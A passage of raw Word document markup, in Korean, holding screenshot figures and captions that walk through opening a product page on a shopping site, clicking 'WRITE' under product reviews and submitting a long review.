    <w:p w14:paraId="0B9C8D80" w14:textId="501F63A4" w:rsidR="00334326" w:rsidRDefault="00720F55" w:rsidP="00334326">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251513856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="734DD6FE" wp14:editId="4B101659">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1997075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>665480</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="863177" cy="2836333"/>
                <wp:effectExtent l="0" t="0" r="13335" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="63" name="직사각형 63"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="863177" cy="28363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3C498" id="직사각형 63" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:157.25pt;margin-top:52.4pt;width:67.95pt;height:223.3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iOswIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdJm7ZRN1XUKgip&#10;aiNa1LPjtbMreT3GdrIJt/IOSLwBFw48FyrvwNj706hUHBA5bDyemW883/ycnW8rRTbCuhJ0RgcH&#10;KSVCc8hLvcroh7v5mxNKnGc6Zwq0yOhOOHo+ff3qrDYTMYQCVC4sQRDtJrXJaOG9mSSJ44WomDsA&#10;IzQqJdiKeRTtKsktqxG9UskwTcdJDTY3FrhwDm8vGyWdRnwpBfc3Ujrhicoovs3Hr43fZfgm0zM2&#10;WVlmipK3z2D/8IqKlRqD9lCXzDOytuUfUFXJLTiQ/oBDlYCUJRcxB8xmkD7L5rZgRsRckBxneprc&#10;/4Pl15uFJWWe0fGIEs0qrNHjt4fHz99//nj49fULwWvkqDZugqa3ZmFbyeExJLyVtgr/mArZRl53&#10;Pa9i6wnHy5PxaHB8TAlH1fBkNB6NImjy5G2s828FVCQcMmqxbpFOtrlyHiOiaWcSgmmYl0rF2ilN&#10;amy80/QojR4OVJkHbbBzdrW8UJZsGJZ/Pk/xF7JBtD0zlJTGy5Bjk1U8+Z0SAUPp90IiQ5jHsIkQ&#10;elP0sIxzof2gURUsF020o/1gnUcMHQEDssRX9tgtQGfZgHTYzZtb++AqYmv3zm3qf3PuPWJk0L53&#10;rkoN9qXMFGbVRm7sO5IaagJLS8h32D8WmsFyhs9LrOAVc37BLE4SzhxuB3+DH6kAKwXtiZIC7KeX&#10;7oM9NjhqKalxMjPqPq6ZFZSodxpb/3RweBhGOQqHR8dDFOy+Zrmv0evqArD6A9xDhsdjsPeqO0oL&#10;1T0ukVmIiiqmOcbOKPe2Ey58szFwDXExm0UzHF/D/JW+NTyAB1ZDh95t75k1bRt7HIBr6KaYTZ51&#10;c2MbPDXM1h5kGVv9ideWbxz92Djtmgq7ZV+OVk/LdPobAAD//wMAUEsDBBQABgAIAAAAIQDO/Onf&#10;3wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqJ0Q0yrEqQAJIRAHKHB3&#10;YzeJaq+j2E3C37Oc4Liap9k31Xbxjk12jH1ABdlKALPYBNNjq+Dz4/FqAywmjUa7gFbBt42wrc/P&#10;Kl2aMOO7nXapZVSCsdQKupSGkvPYdNbruAqDRcoOYfQ60Tm23Ix6pnLveC7EDfe6R/rQ6cE+dLY5&#10;7k5ewVs4Hrj7yvOX9f1Tvn72m7mdXpW6vFjuboElu6Q/GH71SR1qctqHE5rInILrrJCEUiAK2kBE&#10;IUUBbK9AykwCryv+f0P9AwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEA&#10;AAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAB2maI6zAgAAlAUA&#10;AA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAM786d/fAAAA&#10;CwEAAA8AAAAAAAAAAAAAAAAADQUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAZBgAA&#10;AAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00334326">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="022BAF21" wp14:editId="43363B5C">
            <wp:extent cx="4572000" cy="3587552"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="1333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25" r="2056" b="18056"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="35875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1B6249" w14:textId="3578E7CD" w:rsidR="00DD543E" w:rsidRPr="00334326" w:rsidRDefault="00334326" w:rsidP="00334326">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="327" w:name="_Toc206630379"/>
      <w:bookmarkStart w:id="328" w:name="_Toc206630517"/>
      <w:bookmarkStart w:id="329" w:name="_Toc209094590"/>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17</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>메인에서 상품 클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="327"/>
      <w:bookmarkEnd w:id="328"/>
      <w:bookmarkEnd w:id="329"/>
    </w:p>
    <w:p w14:paraId="7BABC9B3" w14:textId="0865D191" w:rsidR="00334326" w:rsidRPr="00334326" w:rsidRDefault="00334326" w:rsidP="00334326">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="251C73A2" w14:textId="56BD445E" w:rsidR="00AB48E9" w:rsidRDefault="001131D8" w:rsidP="00AB48E9">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251435008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35F4B213" wp14:editId="129008E6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5096509</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1149984</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="347133" cy="278977"/>
                <wp:effectExtent l="0" t="0" r="15240" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474561" name="직사각형 1951474561"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="347133" cy="2789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F2C4F" id="직사각형 1951474561" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:401.3pt;margin-top:90.55pt;width:27.35pt;height:21.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OHuQIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0mOHSdC5MBI4KJA&#10;kARNiqxpirQEUCRL0pbdXXqHAr1BN130XEV6hw5JSTHSoIuiXtCkZubNzJvP6dm2EWjDjK2VLHB2&#10;kGLEJFVlLVcF/nC3eHOMkXVElkQoyQq8YxafzV6/Om11zkaqUqJkBgGItHmrC1w5p/MksbRiDbEH&#10;SjMJQq5MQxw8zSopDWkBvRHJKE2PklaZUhtFmbXw9SIK8Szgc86ou+bcModEgSE2F04TzqU/k9kp&#10;yVeG6KqmXRjkH6JoSC3B6QB1QRxBa1P/AdXU1CiruDugqkkU5zVlIQfIJkufZXNbEc1CLkCO1QNN&#10;9v/B0qvNjUF1CbU7mWTj6XhylGEkSQO1evz28Pj5+88fD7++fkF7YuCs1TYH01t9Y7qXhasnYMtN&#10;4/8hNbQNPO8GntnWIQofD8fT7PAQIwqi0fT4ZDr1dUiejLWx7i1TDfKXAhsoY2CXbC6ti6q9ivcl&#10;1aIWAr6TXEjU+lzSSRosrBJ16aVeaM1qeS4M2hDohsUihV/neE8NwhASovEpxqTCze0Eiw7eMw6E&#10;QRqj6MG3KhtgCaVMuiyKKlKy6G2y76y3CDkLCYAemUOUA3YH0GtGkB47MtDpe1MWOn0w7lL/m/Fg&#10;ETwr6QbjppbKvJSZgKw6z1G/JylS41laqnIH7WRUnDOr6aKGCl4S626IgcGCEYRl4a7h4EJBpVR3&#10;w6hS5tNL370+9DtIMWphUAtsP66JYRiJdxIm4SQbj/1kh8d4Mh3Bw+xLlvsSuW7OFVQfmhyiC1ev&#10;70R/5UY197BT5t4riIik4LvA1Jn+ce7iAoGtRNl8HtRgmjVxl/JWUw/uWfUdere9J0Z3beyg/69U&#10;P9Qkf9bNUddbSjVfO8Xr0OpPvHZ8wyYIjdNtLb9q9t9B62m3zn4DAAD//wMAUEsDBBQABgAIAAAA&#10;IQBItzhw3wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqB2jNlaIUwES&#10;QiAOpcDdjbdJ1NiOYjcJf89yguNqnmbeltvF9WzCMXbBa8hWAhj6OtjONxo+P55uFLCYjLemDx41&#10;fGOEbXV5UZrChtm/47RPDaMSHwujoU1pKDiPdYvOxFUY0FN2DKMzic6x4XY0M5W7nkshNtyZztNC&#10;awZ8bLE+7c9Owy6cjrz/kvI1f3iW+YtTczO9aX19tdzfAUu4pD8YfvVJHSpyOoSzt5H1GpSQG0Ip&#10;UFkGjAi1zm+BHTRIuRbAq5L//6H6AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEzAk4e5&#10;AgAAowUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAEi3&#10;OHDfAAAACwEAAA8AAAAAAAAAAAAAAAAAEwUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAAfBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AB48E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DF1F711" wp14:editId="3AB2162E">
            <wp:extent cx="4571365" cy="1572684"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="27940"/>
            <wp:docPr id="1951474560" name="그림 195147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092" b="26325"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1572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54CC4" w14:textId="4B7DECC3" w:rsidR="00334326" w:rsidRPr="00334326" w:rsidRDefault="00AB48E9" w:rsidP="00AB48E9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="330" w:name="_Toc206630380"/>
      <w:bookmarkStart w:id="331" w:name="_Toc206630518"/>
      <w:bookmarkStart w:id="332" w:name="_Toc209094591"/>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18</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>상품</w:t>
      </w:r>
      <w:r w:rsidR="000D5577">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">설명 하단 </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>상품평</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D30F4D">
        <w:t>WRITE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="330"/>
      <w:bookmarkEnd w:id="331"/>
      <w:bookmarkEnd w:id="332"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BE7E7D" w14:textId="5B07546E" w:rsidR="00334326" w:rsidRPr="00334326" w:rsidRDefault="00334326" w:rsidP="00334326">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B765E7E" w14:textId="1B0E04AD" w:rsidR="006720CC" w:rsidRDefault="00AB5FD3" w:rsidP="00AB5FD3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251450368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03D628C8" wp14:editId="5D09A625">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2854325</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3861435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="390525" cy="209550"/>
                <wp:effectExtent l="0" t="0" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474564" name="직사각형 1951474564"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3905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81955" id="직사각형 1951474564" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:224.75pt;margin-top:304.05pt;width:30.75pt;height:16.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JEtgIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDch25KomypqFYRU&#10;tREt6tnx2tmVvB5jO3/cyjsg8QZcOPBcqLwDY+9Po1JxQOTgeHZmvvF883N6tqsV2QjrKtA5HRyl&#10;lAjNoaj0Kqcfbuev3lDiPNMFU6BFTvfC0bPpyxenWzMRQyhBFcISBNFusjU5Lb03kyRxvBQ1c0dg&#10;hEalBFszj6JdJYVlW0SvVTJM0+NkC7YwFrhwDr9eNEo6jfhSCu6vpXTCE5VTfJuPp43nMpzJ9JRN&#10;VpaZsuLtM9g/vKJmlcagPdQF84ysbfUHVF1xCw6kP+JQJyBlxUXMAbMZpE+yuSmZETEXJMeZnib3&#10;/2D51WZhSVVg7cbZYHQyyo5HlGhWY60evt0/fP7+88f9r69fyIEaOdsaN0HXG7OwreTwGgjYSVuH&#10;f0yN7CLP+55nsfOE48fX4zQbZpRwVA3TcZbFOiSPzsY6/1ZATcIlpxbLGNllm0vnMSCadiYhloZ5&#10;pVQspdJkG3JJETOoHKiqCNoo2NXyXFmyYdgN83mKv9AAiHZghpLS+DGk2CQVb36vRMBQ+r2QSBim&#10;MWwihFYVPSzjXGg/aFQlK0QTLTsM1nnE0BEwIEt8ZY/dAnSWDUiH3by5tQ+uInZ679ym/jfn3iNG&#10;Bu1757rSYJ/LTGFWbeTGviOpoSawtIRij+1koZkzZ/i8wgpeMucXzOJg4QjisvDXeEgFWClob5SU&#10;YD899z3YY7+jlpItDmpO3cc1s4IS9U7jJIwHo1GY7CiMspMhCvZQszzU6HV9Dlj9Aa4lw+M12HvV&#10;XaWF+g53yixERRXTHGPnlHvbCee+WSC4lbiYzaIZTrNh/lLfGB7AA6uhQ293d8yato099v8VdEPN&#10;Jk+6ubENnhpmaw+yiq3+yGvLN26C2Djt1gqr5lCOVo+7dfobAAD//wMAUEsDBBQABgAIAAAAIQD1&#10;Mfd74AAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwDIbvSLxDZCRuLE3VbV1pOgESQqAd&#10;YIx71mRttcSpmqwtb485wdH2p9/fX25nZ9lohtB5lCAWCTCDtdcdNhIOn893ObAQFWplPRoJ3ybA&#10;trq+KlWh/YQfZtzHhlEIhkJJaGPsC85D3RqnwsL3Bul28oNTkcah4XpQE4U7y9MkWXGnOqQPrerN&#10;U2vq8/7iJLz784nbrzR9Wz++pOtXl0/NuJPy9mZ+uAcWzRz/YPjVJ3WoyOnoL6gDsxKybLMkVMIq&#10;yQUwIpZCULsjbTIhgFcl/9+h+gEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCEb3JEtgIA&#10;AKMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQD1Mfd7&#10;4AAAAAsBAAAPAAAAAAAAAAAAAAAAABAFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;HQYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006720CC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62533A06" wp14:editId="5637C590">
            <wp:extent cx="4572000" cy="4110273"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24130"/>
            <wp:docPr id="1951474563" name="그림 195147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952" r="1782" b="7554"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="41102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EE3B1" w14:textId="7A20438F" w:rsidR="00334326" w:rsidRPr="00334326" w:rsidRDefault="006720CC" w:rsidP="006720CC">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="333" w:name="_Toc206630381"/>
      <w:bookmarkStart w:id="334" w:name="_Toc206630519"/>
      <w:bookmarkStart w:id="335" w:name="_Toc209094592"/>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19</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">긴 리뷰 작성 후 </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>작성하기</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="333"/>
      <w:bookmarkEnd w:id="334"/>
      <w:bookmarkEnd w:id="335"/>
    </w:p>
    <w:p w14:paraId="663B8165" w14:textId="13DFFF5F" w:rsidR="00334326" w:rsidRPr="00334326" w:rsidRDefault="00334326" w:rsidP="00334326">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C14C52F" w14:textId="605FE249" w:rsidR="009A0C67" w:rsidRDefault="00564B78" w:rsidP="00661543">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251460608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DE2A9F8" wp14:editId="34A30346">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3750310</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1229995</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1352550" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474567" name="직사각형 1951474567"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1352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C3ED" id="직사각형 1951474567" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:295.3pt;margin-top:96.85pt;width:106.5pt;height:9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p6uAIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHfTpKVRN1XUKgip&#10;KhUt6tnx2tmVvB5jO9mEW3kHJN6ACweeC5V3YOz9aVQqDogcHM/OzDeeb35Oz7a1IhthXQU6p9lB&#10;SonQHIpKr3L64Xbx6jUlzjNdMAVa5HQnHD2bvXxx2pipGEEJqhCWIIh208bktPTeTJPE8VLUzB2A&#10;ERqVEmzNPIp2lRSWNYheq2SUpkdJA7YwFrhwDr9etEo6i/hSCu7fSemEJyqn+DYfTxvPZTiT2Smb&#10;riwzZcW7Z7B/eEXNKo1BB6gL5hlZ2+oPqLriFhxIf8ChTkDKiouYA2aTpU+yuSmZETEXJMeZgSb3&#10;/2D51ebakqrA2p1MsvHxeHJ0TIlmNdbq4dv9w+fvP3/c//r6heypkbPGuCm63phr20kOr4GArbR1&#10;+MfUyDbyvBt4FltPOH7MDiejyQTLwVGXZePDNBYiefQ21vk3AmoSLjm1WMdIL9tcOo8R0bQ3CcE0&#10;LCqlYi2VJk1IJkX8oHKgqiJoo2BXy3NlyYZhOywWKf5CByDanhlKSuPHkGObVbz5nRIBQ+n3QiJj&#10;mMeojRB6VQywjHOhfdaqSlaINtpkP1jvEUNHwIAs8ZUDdgfQW7YgPXb75s4+uIrY6oNzl/rfnAeP&#10;GBm0H5zrSoN9LjOFWXWRW/uepJaawNISih32k4V20JzhiworeMmcv2YWJwuLjtvCv8NDKsBKQXej&#10;pAT76bnvwR4bHrWUNDipOXUf18wKStRbjaNwko3HYbSjMJ4cj1Cw+5rlvkav63PA6me4lwyP12Dv&#10;VX+VFuo7XCrzEBVVTHOMnVPubS+c+3aD4FriYj6PZjjOhvlLfWN4AA+shg693d4xa7o29jgAV9BP&#10;NZs+6ebWNnhqmK89yCq2+iOvHd+4CmLjdGsr7Jp9OVo9LtfZbwAAAP//AwBQSwMEFAAGAAgAAAAh&#10;APC3wA/gAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJG4saSbWrjSdAAkh&#10;0A4wtnvWeG21JqmarC1vjznB0f4//f5cbGbbsRGH0HqnIFkIYOgqb1pXK9h/vdxlwELUzujOO1Tw&#10;jQE25fVVoXPjJ/eJ4y7WjEpcyLWCJsY+5zxUDVodFr5HR9nJD1ZHGoeam0FPVG47LoVYcatbRxca&#10;3eNzg9V5d7EKPvz5xLuDlO/p06tM32w21eNWqdub+fEBWMQ5/sHwq0/qUJLT0V+cCaxTcL8WK0Ip&#10;WC9TYERkYkmbowKZJCnwsuD/fyh/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMfienq4&#10;AgAApAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAPC3&#10;wA/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518976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19B2C36C" wp14:editId="6CC165B9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1153160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1579245</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4178300" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="12700" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474566" name="직사각형 1951474566"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="41783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6B499" id="직사각형 1951474566" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:90.8pt;margin-top:124.35pt;width:329pt;height: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j0twIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u1DAQviPxDpbvNMmS7U/UbLVqtQip&#10;KhUt6tnr2JtIjm1s72aXW3kHJN6ACweeC5V3YGwn6apUHBB78I4zM994vvk5Pdu2Am2YsY2SJc4O&#10;UoyYpKpq5KrEH24Xr44xso7IigglWYl3zOKz2csXp50u2ETVSlTMIACRtuh0iWvndJEkltasJfZA&#10;aSZByZVpiYOrWSWVIR2gtyKZpOlh0ilTaaMosxa+XkQlngV8zhl17zi3zCFRYnibC6cJ59KfyeyU&#10;FCtDdN3Q/hnkH17RkkZC0BHqgjiC1qb5A6ptqFFWcXdAVZsozhvKQg6QTZY+yeamJpqFXIAcq0ea&#10;7P+DpVeba4OaCmp3Ms3yo3x6eIiRJC3U6uHb/cPn7z9/3P/6+gXtqYGzTtsCXG/0telvFkRPwJab&#10;1v9DamgbeN6NPLOtQxQ+5tnR8esUykFBl2W5lwEmefTWxro3TLXICyU2UMdAL9lcWhdNBxMfTKpF&#10;IwR8J4WQqPPJpNM0eFglmsprvdKa1fJcGLQh0A6LRQq/PvCeGTxDSHiNzzFmFSS3EywGeM84MAZ5&#10;TGIE36tshCWUMumyqKpJxWK06X6wwSPkLCQAemQOrxyxe4DBMoIM2JGB3t67stDqo3Of+t+cR48Q&#10;WUk3OreNVOa5zARk1UeO9gNJkRrP0lJVO+gno+KgWU0XDVTwklh3TQxMFhQdtoV7BwcXCiqlegmj&#10;WplPz3339tDwoMWog0ktsf24JoZhJN5KGIWTLM/9aIdLPj2awMXsa5b7GrluzxVUP4O9pGkQvb0T&#10;g8iNau9gqcx9VFARSSF2iakzw+XcxQ0Ca4my+TyYwThr4i7ljaYe3LPqO/R2e0eM7tvYwQBcqWGq&#10;SfGkm6Ot95RqvnaKN6HVH3nt+YZVE